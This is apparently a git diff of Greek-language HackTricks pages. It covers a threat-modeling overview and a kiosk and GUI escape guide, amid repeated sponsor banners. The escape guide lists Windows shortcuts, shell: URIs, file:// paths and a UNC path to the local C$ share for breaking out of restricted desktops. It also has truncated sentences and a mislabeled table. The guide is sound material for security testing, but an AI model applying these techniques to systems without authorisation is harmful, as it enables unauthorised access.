* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,23 +1,61 @@
|
|||
# Μοντελοποίηση Απειλών
|
||||
# Μοντέλο Απειλής
|
||||
|
||||
## Μοντελοποίηση Απειλών
|
||||
## WhiteIntel
|
||||
|
||||
Καλωσορίσατε στον πλήρη οδηγό του HackTricks για τη Μοντελοποίηση Απειλών! Ξεκινήστε μια εξερεύνηση αυτού του κρίσιμου κομματιού της κυβερνοασφάλειας, όπου αναγνωρίζουμε, κατανοούμε και στρατηγικεύουμε ενάντια σε πιθανές ευπάθειες σε ένα σύστημα. Αυτό το νήμα λειτουργεί ως ένας οδηγός βήμα προς βήμα γεμάτος πραγματικά παραδείγματα, χρήσιμο λογισμικό και ευανάγνωστες εξηγήσεις. Ιδανικό για αρχάριους και έμπειρους επαγγελματίες που επιθυμούν να ενισχύσουν την κυβερνοασφάλεια τους.
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Συνηθισμένα Σενάρια Χρήσης
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
1. **Ανάπτυξη Λογισμικού**: Στο πλαίσιο του Ασφαλούς Κύκλου Ζωής Ανάπτυξης Λογισμικού (SSDLC), η μοντελοποίηση απειλών βοηθά στην **αναγνώριση πιθανών πηγών ευπαθειών** στα αρχικά στάδια ανάπτυξης.
|
||||
2. **Δοκιμή Διείσδυσης**: Το πλαίσιο Εκτέλεσης Προτύπου Δοκιμής Διείσδυσης (PTES) απαιτεί **μοντελοποίηση απειλών για την κατανόηση των ευπαθειών του συστήματος** πριν από τη διεξαγωγή της δοκιμής.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
### Το Μοντέλο Απειλών σε Λίγα Λόγια
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
Ένα Μοντέλο Απειλών αναπαρίσταται συνήθως ως διάγραμμα, εικόνα ή κάποια άλλη μορφή οπτικής απεικόνισης που απεικονίζει την προγραμματισμένη αρχιτεκτονική ή την υπάρχουσα δομή μιας εφαρμογής. Μοιάζει με ένα **διάγραμμα ροής δεδομένων**, αλλά η κύρια διαφορά βρίσκεται στον ασφαλειοκεντρικό του σχεδιασμό.
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
Τα μοντέλα απειλών συχνά περιλαμβάνουν στοιχεία που είναι σημειωμένα με κόκκινο, συμβολίζοντας πιθανές ευπάθειες, κινδύνους ή φραγές. Για να διευκολυνθεί η διαδικασία αναγνώρισης κινδύνων, χρησιμοποιείται η τριάδα CIA (Εχειριστικότητα, Ακεραιότητα, Διαθεσιμότητα), που αποτελεί τη βάση πολλών μεθοδολογιών μοντελοποίησης απειλών, με το STRIDE να είναι μία από τις πιο κοινές. Ωστόσο, η επιλεγμένη μεθοδολογία μπορεί να διαφέρει ανάλογα με το συγκεκριμένο πλαίσιο και τις απαιτήσεις.
|
||||
---
|
||||
|
||||
## Μοντέλο Απειλής
|
||||
|
||||
Καλώς ήρθατε στον πλήρη οδηγό του HackTricks για το Μοντέλο Απειλής! Ξεκινήστε μια εξερεύνηση αυτού του κρίσιμου κομματιού της κυβερνοασφάλειας, όπου αναγνωρίζουμε, κατανοούμε και στρατηγικεύουμε ενάντια σε πιθανές ευπάθειες σε ένα σύστημα. Αυτό το νήμα λειτουργεί ως ένας οδηγός βήμα προς βήμα γεμάτος με πραγματικά παραδείγματα, χρήσιμο λογισμικό και εύκολα κατανοητές εξηγήσεις. Ιδανικό τόσο για αρχάριους όσο και για έμπειρους ειδικούς που επιθυμούν να ενισχύσουν τις κυβερνοασφαλείς τους υπεράσπισης.
|
||||
|
||||
### Συνηθισμένα Χρησιμοποιούμενα Σενάρια
|
||||
|
||||
1. **Ανάπτυξη Λογισμικού**: Ως μέρος του Ασφαλούς Κύκλου Ζωής Ανάπτυξης Λογισμικού (SSDLC), το μοντέλο απειλής βοηθάει στο **αναγνωρισμό πιθανών πηγών ευπαθειών** στα αρχικά στάδια ανάπτυξης.
|
||||
2. **Δοκιμές Διείσδυσης**: Το πλαίσιο Εκτέλεσης Δοκιμών Διείσδυσης (PTES) απαιτεί το **μοντέλο απειλής για την κατανόηση των ευπαθειών του συστήματος** πριν προχωρήσει στη δοκιμή.
|
||||
|
||||
### Μοντέλο Απειλής σε Γενικές Γραμμές
|
||||
|
||||
Ένα Μοντέλο Απειλής αναπαρίσταται συνήθως ως διάγραμμα, εικόνα ή κάποια άλλη μορφή οπτικής απεικόνισης που απεικονίζει την προγραμματισμένη αρχιτεκτονική ή την υπάρχουσα κατασκευή μιας εφαρμογής. Μοιάζει με ένα **διάγραμμα ροής δεδομένων**, αλλά η κύρια διαφορά βρίσκεται στον σχεδιασμό που εστιάζει στην ασφάλεια.
|
||||
|
||||
Τα μοντέλα απειλής συχνά περιλαμβάνουν στοιχεία που είναι σημειωμένα με κόκκινο, συμβολίζοντας πιθανές ευπάθειες, κινδύνους ή φραγματικά μέτρα. Για να διευκολυνθεί η διαδικασία αναγνώρισης κινδύνων, χρησιμοποιείται η τριάδα CIA (Εμπιστευτικότητα, Ακεραιότητα, Διαθεσιμότητα), η οποία αποτελεί τη βάση πολλών μεθοδολογιών μοντελοποίησης απειλών, με το STRIDE να είναι μία από τις πιο κοινές. Ωστόσο, η επιλεγμένη μεθοδολογία μπορεί να ποικίλλει ανάλογα με το συγκεκριμένο πλαίσιο και τις απαιτήσεις.
|
||||
|
||||
### Η Τριάδα CIA
|
||||
|
||||
Η Τριάδα CIA είναι ένα ευρέως αναγνωρισμένο μοντέλο στον τομέα της πληροφοριακής ασφάλειας, που σημαίνει Εχειριστικότητα, Ακεραιότητα και Διαθεσιμότητα. Αυτά τα τρία θεμέλια αποτελούν τη βάση πολλών μέτρων ασφαλείας και πολιτικών, συμπεριλαμβανομένων των μεθοδολογιών μοντελοποίησης απειλών.
|
||||
Η Τριάδα CIA είναι ένα ευρέως αναγνωρισμένο μοντέλο στον τομέα της πληροφοριακής ασφάλειας, στέκοντας για Εμπιστευτικότητα, Ακεραιότητα και Διαθεσιμότητα. Αυτοί οι τρεις πυλώνες αποτελούν τη βάση στην οποία βασίζονται πολλά μέτρα ασφαλείας και πολιτικές, συμπεριλαμβανομένων των μεθοδολογιών μοντελοποίησης απειλών.
|
||||
|
||||
1. **Εχειριστικότητα**: Βεβαιώνει ότι τα δεδομένα ή το σύστημα δεν προσπελάζονται από μη εξουσιοδοτημένα άτομα. Αυτό είναι ένα κεντρικό στοιχείο της ασφάλειας, που απαιτεί κατάλληλους μηχανισμούς πρόσβασης, κρυπτογράφηση και άλλα μέτρα για την αποτροπή διαρροών δεδομένων.
|
||||
2. **Ακεραιότητα**: Η ακρίβεια, η συνέπεια και η αξιοπιστία των δεδομένων κατά τη διάρκεια του κύκλου ζωής τους. Αυτή η αρχή εξασφαλίζει ότι τα δεδομένα δεν τροποποιούνται ή παραβιάζονται από μη εξουσιοδοτημένα μέρη. Συχνά περιλαμβάνει έλεγχους ακεραιότητας, κατακερματισμό και άλλες μεθόδους
|
||||
1. **Εμπιστευτικότητα**: Βεβαιωθείτε ότι τα δεδομένα ή το σύστημα δεν προσπελάζονται από μη εξουσιοδοτημένα άτομα. Αυτό είναι ένα κεντρικό στοιχείο της ασφάλειας, απαιτώντας κατάλληλους ελέγχους πρόσβασης, κρυπτογράφηση και άλλα μέτρα για να αποτρέψετε τις διαρροές δεδομένων.
|
||||
2. **Ακεραιότητα**: Η ακρίβεια, η συνέπεια και η αξιοπιστία των δεδομένων κατά τη διάρκεια του κύκλου ζωής τους. Αυτή η αρχή εξασφαλίζει ότι τα δεδομένα δεν τροποποιούνται ή δεν παραβιάζονται από μη εξουσιοδοτημένα μέρη. Συχνά περιλαμβάνει checksums, hashing και άλλες μεθόδους επαλήθευσης δεδομένων.
|
||||
3. **Διαθεσιμότητα**: Αυτό εξασφαλίζει ότι τα δεδομένα και οι υπηρεσίες είναι προσβάσιμα στους εξουσιοδοτημένους χρήστες όταν χρειάζονται. Συχνά περιλαμβάνει αντιγραφικότητα, ανοχή σφαλμάτων και ρυθμίσεις υψηλής διαθεσιμότητας για να διατηρούνται τα συστήματα λειτουργικά ακόμη και αν υπάρξουν διακοπές.
|
||||
|
||||
### Μεθοδολογίες Μοντελοποίησης Απειλών
|
||||
|
||||
1. **STRIDE**: Αναπτύχθηκε από τη Microsoft, το STRIDE είναι μια ακρώνυμη για **Παραποίηση, Παραβίαση, Αρνητική Αναγνώριση, Διαρροή Πληροφοριών, Αρνηση Υπηρεσίας και Ανύψωση Προνομίων**. Κάθε κατηγορία αντιπροσωπεύει έναν τύπο απειλής, και αυτή η μεθοδολογία χρησιμοποιείται συχνά στη φάση σχεδιασμού ενός προγράμματος ή συστήματος για την αναγνώριση πιθανών απειλών.
|
||||
2. **DREAD**: Αυτή είναι μια άλλη μεθοδολογία από τη Microsoft που χρησιμοποιείται για την αξιολόγηση κινδύνου των εντοπισμένων απειλών. Το DREAD σημαίνει **Δυναμικό Ζημίας, Επαναληψιμότητα, Εκμεταλλευσιμότητα, Επηρεαζόμενοι Χρήστες και Ανακαλύψιμοτητα**. Κάθε ένας από αυτούς τους παράγοντες βαθμολογείται, και το αποτέλεσμα χρησιμοποιείται για την προτεραιοποίηση των εντοπισμένων απειλών.
|
||||
3. **PASTA** (Διαδικασία για Προσομοίωση Επίθεσης και Ανάλυση Απειλών): Αυτή είναι μια μεθοδολογία επτά βημάτων, **εστιάζοντας στον κίνδυνο**. Περιλαμβάνει τον καθορισμό και την αναγνώριση των ασφαλειακών στόχων, τη δημιουργία ενός τεχνικού πεδίου, την ανάλυση απειλών, την ανάλυση ευπαθειών και την αξιολόγηση κινδύνων/τριαγκούλας.
|
||||
4. **Trike**: Αυτή είναι μια μεθοδολογία βασισμένη στον κίνδυνο που εστ
|
||||
### [Εργαλείο Threat Modeling της Microsoft](https://aka.ms/threatmodelingtool)
|
||||
|
||||
Αυτό είναι ένα δωρεάν εργαλείο από τη Microsoft που βοηθά στον εντοπισμό απειλών στη φάση σχεδιασμού των έργων λογισμικού. Χρησιμοποιεί τη μεθοδολογία STRIDE και είναι ιδιαίτερα κατάλληλο για εκείνους που αναπτύσσουν στο σωρό της Microsoft.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
|
|
@ -1,21 +1,34 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
# Ελέγξτε για πιθανές ενέργειες μέσα στην εφαρμογή GUI
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Οι **Κοινές Διάλογοι** είναι αυτές οι επιλογές για **αποθήκευση αρχείου**, **ανοιγμα αρχείου**, επιλογή γραμματοσειράς, χρώματος... Οι περισσότερες από αυτές θα **προσφέρουν μια πλήρη λειτουργικότητα του Explorer**. Αυτό σημαίνει ότι θα μπορείτε να έχετε πρόσβαση σε λειτουργίες του Explorer εάν έχετε πρόσβαση σε αυτές τις επιλογές:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
# Έλεγχος για πιθανές ενέργειες μέσα στην εφαρμογή GUI
|
||||
|
||||
Οι **Κοινές Διάλογοι** είναι αυτές οι επιλογές όπως **αποθήκευση ενός αρχείου**, **άνοιγμα ενός αρχείου**, επιλογή γραμματοσειράς, χρώματος... Οι περισσότεροι από αυτούς θα **προσφέρουν πλήρη λειτουργικότητα Explorer**. Αυτό σημαίνει ότι θα μπορείτε να έχετε πρόσβαση σε λειτουργίες του Explorer αν μπορείτε να έχετε πρόσβαση σε αυτές τις επιλογές:
|
||||
|
||||
* Κλείσιμο/Κλείσιμο ως
|
||||
* Άνοιγμα/Άνοιγμα με
|
||||
|
@ -24,7 +37,7 @@
|
|||
* Αναζήτηση
|
||||
* Σάρωση
|
||||
|
||||
Θα πρέπει να ελέγξετε εάν μπορείτε:
|
||||
Θα πρέπει να ελέγξετε αν μπορείτε:
|
||||
|
||||
* Να τροποποιήσετε ή να δημιουργήσετε νέα αρχεία
|
||||
* Να δημιουργήσετε συμβολικούς συνδέσμους
|
||||
|
@ -37,7 +50,7 @@
|
|||
|
||||
### Windows
|
||||
|
||||
Για παράδειγμα _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ βρείτε περισσότερα δυαδικά που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών (και για την εκτέλεση απροσδόκητων ενεργειών) εδώ: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
Για παράδειγμα _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ βρείτε περισσότερα δυαδικά που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών (και εκτέλεση απροσδόκητων ενεργειών) εδώ: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
|
||||
### \*NIX __
|
||||
|
||||
|
@ -45,31 +58,87 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
|
||||
# Windows
|
||||
|
||||
## Παράκαμψη περιορισμών διαδρομής
|
||||
## Παράκαμψη περιορισμών διαδρομών
|
||||
|
||||
* **Μεταβλητές περιβάλλοντος**: Υπάρχουν πολλές μεταβλητές περιβάλλοντος που δείχνουν σε κάποια διαδρομή
|
||||
* **Άλλα πρωτόκολλα**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
|
||||
* **Άλλοι πρωτόκολλοι**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
|
||||
* **Συμβολικοί σύνδεσμοι**
|
||||
* **Συντομεύσεις**: CTRL+N (ανοίγει νέα συνεδρία), CTRL+R (Εκτέλεση Εντολών), CTRL+SHIFT+ESC (Διαχειριστής Εργασιών), Windows+E (ανοίγει τον εξερευνητή), CTRL-B, CTRL-I (Αγαπημένα), CTRL-H (Ιστορικό), CTRL-L, CTRL-O (Διάλογος Ανοίγματος Αρχείου), CTRL-P (Διάλογος Εκτύπωσης), CTRL-S (Αποθήκευση ως)
|
||||
* **Συντομεύσεις**: CTRL+N (ανοίγει νέα συνεδρία), CTRL+R (Εκτέλεση Εντολών), CTRL+SHIFT+ESC (Διαχειριστής Εργασιών), Windows+E (ανοίγει τον εξερευνητή), CTRL-B, CTRL-I (Αγαπημένα), CTRL-H (Ιστορικό), CTRL-L, CTRL-O (Διάλογος Αρχείου/Άνοιγμα), CTRL-P (Διάλογος Εκτύπωσης), CTRL-S (Αποθήκευση ως)
|
||||
* Κρυφό μενού Διαχειριστή: CTRL-ALT-F8, CTRL-ESC-F9
|
||||
* **URI του κέλυφους**: _shell:Εργαλεία Διαχείρισης, shell:ΒιβλιοθήκεςΕγγράφων, shell:Βιβλιοθήκες, shell:ΠροφίλΧρηστών, shell:Προσωπικό, shell:ΦάκελοςΑναζήτησης, shell:Σύστημαshell:ΦάκελοςΔικτύου, shell:ΣτείλεΣε, shell:ΠροφίλΧρηστών, shell:Κοινά Εργαλεία Διαχείρισης, shell:ΥπολογιστήςΦάκελος, shell:ΦάκελοςInternet,_
|
||||
* **Διαδρομές UNC**: Διαδρομές για σύνδεση σε κοινόχ
|
||||
## Σάρωση
|
||||
* **URI κελύφους**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
|
||||
* **Διαδρομές UNC**: Διαδρομές για σύνδεση σε κοινόχρηστους φακέλους. Θα πρέπει να δοκιμάσετε να συνδεθείτε στο C$ του τοπικού υπολογιστή ("\\\127.0.0.1\c$\Windows\System32")
|
||||
* **Περισσότερες διαδρομές UNC:**
|
||||
|
||||
* Σαρώστε από την αριστερή πλευρά προς τη δεξιά για να δείτε όλα τα ανοιχτά παράθυρα, ελαχιστοποιώντας την εφαρμογή KIOSK και έχοντας πρόσβαση στον πλήρη λειτουργικό σύστημα απευθείας.
|
||||
* Σαρώστε από τη δεξιά πλευρά προς την αριστερά για να ανοίξετε το Κέντρο Δράσης, ελαχιστοποιώντας την εφαρμογή KIOSK και έχοντας πρόσβαση στον πλήρη λειτουργικό σύστημα απευθείας.
|
||||
* Σαρώστε από την επάνω άκρη προς τα μέσα για να εμφανιστεί η γραμμή τίτλου για μια εφαρμογή που έχει ανοίξει σε πλήρη οθόνη.
|
||||
* Σαρώστε προς τα πάνω από το κάτω μέρος για να εμφανιστεί η γραμμή εργασιών σε μια εφαρμογή πλήρους οθόνης.
|
||||
| UNC | UNC | UNC |
|
||||
| ------------------------- | -------------- | -------------------- |
|
||||
| %ALLUSERSPROFILE% | %APPDATA% | %CommonProgramFiles% |
|
||||
| %COMMONPROGRAMFILES(x86)% | %COMPUTERNAME% | %COMSPEC% |
|
||||
| %HOMEDRIVE% | %HOMEPATH% | %LOCALAPPDATA% |
|
||||
| %LOGONSERVER% | %PATH% | %PATHEXT% |
|
||||
| %ProgramData% | %ProgramFiles% | %ProgramFiles(x86)% |
|
||||
| %PROMPT% | %PSModulePath% | %Public% |
|
||||
| %SYSTEMDRIVE% | %SYSTEMROOT% | %TEMP% |
|
||||
| %TMP% | %USERDOMAIN% | %USERNAME% |
|
||||
| %USERPROFILE% | %WINDIR% | |
|
||||
|
||||
## Λήψη των Δυαδικών Σας
|
||||
|
||||
Κονσόλα: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
Εξερευνητής: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
Επεξεργαστής μητρώου: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
|
||||
## Πρόσβαση στο σύστημα αρχείων από τον περιηγητή
|
||||
|
||||
| ΔΙΑΔΡΟΜΗ | ΔΙΑΔΡΟΜΗ | ΔΙΑΔΡΟΜΗ | ΔΙΑΔΡΟΜΗ |
|
||||
| ------------------- | ----------------- | ------------------ | ------------------- |
|
||||
| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows |
|
||||
| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
|
||||
| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ |
|
||||
| C:/windows | C:/windows/ | C:/windows\\ | C:\windows |
|
||||
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
|
||||
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
|
||||
| %HOMEDRIVE% | %HOMESHARE | | <p><br></p> |
|
||||
|
||||
## Συντομεύσεις
|
||||
|
||||
* Sticky Keys – Πατήστε SHIFT 5 φορές
|
||||
* Mouse Keys – SHIFT+ALT+NUMLOCK
|
||||
* High Contrast – SHIFT+ALT+PRINTSCN
|
||||
* Toggle Keys – Κρατήστε πατημένο το NUMLOCK για 5 δευτερόλεπτα
|
||||
* Filter Keys – Κρατήστε πατημένο το δεξί SHIFT για 12 δευτερόλεπτα
|
||||
* WINDOWS+F1 – Αναζήτηση Windows
|
||||
* WINDOWS+D – Εμφάνιση επιφάνειας εργασίας
|
||||
* WINDOWS+E – Εκκίνηση του Windows Explorer
|
||||
* WINDOWS+R – Εκτέλεση
|
||||
* WINDOWS+U – Κέντρο Ευκολιών Πρόσβασης
|
||||
* WINDOWS+F – Αναζήτηση
|
||||
* SHIFT+F10 – Μενού περιβάλλοντος
|
||||
* CTRL+SHIFT+ESC – Διαχειριστής Εργασιών
|
||||
* CTRL+ALT+DEL – Οθόνη εκκίνησης σε νεότερες εκδόσεις των Windows
|
||||
* F1 – Βοήθεια F3 – Αναζήτηση
|
||||
* F6 – Γραμμή διεύθυνσης
|
||||
* F11 – Εναλλαγή πλήρους οθόνης μέσα στο Internet Explorer
|
||||
* CTRL+H – Ιστορικό Internet Explorer
|
||||
* CTRL+T – Internet Explorer – Νέα καρτέλα
|
||||
* CTRL+N – Internet Explorer – Νέα σελίδα
|
||||
* CTRL+O – Άνοιγμα Αρχείου
|
||||
* CTRL+S – Αποθήκευση CTRL+N – Νέα RDP / Citrix
|
||||
## Σβησίματα
|
||||
|
||||
* Σύρετε από την αριστερή πλευρά προς τη δεξιά για να δείτε όλα τα ανοιχτά παράθυρα, ελαχιστοποιώντας την εφαρμογή KIOSK και έχοντας πρόσβαση απευθείας στον πλήρη λειτουργικό σύστημα.
|
||||
* Σύρετε από τη δεξιά πλευρά προς την αριστερή για να ανοίξετε το Κέντρο Δράσης, ελαχιστοποιώντας την εφαρμογή KIOSK και έχοντας πρόσβαση απευθείας στον πλήρη λειτουργικό σύστημα.
|
||||
* Σύρετε από την επάνω άκρη για να εμφανιστεί η γραμμή τίτλου για μια εφαρμογή που έχει ανοίξει σε πλήρη οθόνη.
|
||||
* Σύρετε προς τα επάνω από το κάτω μέρος για να εμφανιστεί η γραμμή εργασιών σε μια εφαρμογή πλήρους οθόνης.
|
||||
|
||||
## Κόλπα Internet Explorer
|
||||
|
||||
### 'Εργαλειοθήκη εικόνων'
|
||||
### 'Εργαλείο Εικόνας'
|
||||
|
||||
Είναι μια εργαλειοθήκη που εμφανίζεται στην πάνω αριστερή γωνία της εικόνας όταν γίνεται κλικ. Θα μπορείτε να Αποθηκεύσετε, Εκτυπώσετε, Αποστολή μέσω ηλεκτρονικού ταχυδρομείου, Ανοίξτε το "Οι εικόνες μου" στον Εξερευνητή. Το Kiosk πρέπει να χρησιμοποιεί τον Internet Explorer.
|
||||
Είναι ένα εργαλείο που εμφανίζεται στην επάνω αριστερή πλευρά της εικόνας όταν γίνεται κλικ. Θα μπορείτε να Αποθηκεύσετε, Εκτυπώσετε, Αποστείλετε μέσω ηλεκτρονικού ταχυδρομείου, Ανοίξετε το "Οι Εικόνες μου" στον Explorer. Το Kiosk πρέπει να χρησιμοποιεί τον Internet Explorer.
|
||||
|
||||
### Πρωτόκολλο Shell
|
||||
### Πρωτόκολλο Κέλυφους
|
||||
|
||||
Πληκτρολογήστε αυτές τις διευθύνσεις URL για να αποκτήσετε μια προβολή του Εξερευνητή:
|
||||
Πληκτρολογήστε αυτές τις διευθύνσεις URL για να λάβετε μια προβολή Explorer:
|
||||
|
||||
* `shell:Administrative Tools`
|
||||
* `shell:DocumentsLibrary`
|
||||
|
@ -88,68 +157,110 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
* `Shell:System`
|
||||
* `Shell:ControlPanelFolder`
|
||||
* `Shell:Windows`
|
||||
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Πίνακας Ελέγχου
|
||||
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Ο υπολογιστής μου
|
||||
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> Οι τοποθεσίες του δικτύου μου
|
||||
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Κέντρο Ελέγχου
|
||||
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Ο Υπολογιστής μου
|
||||
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> Οι Τοποθεσίες του Δικτύου μου
|
||||
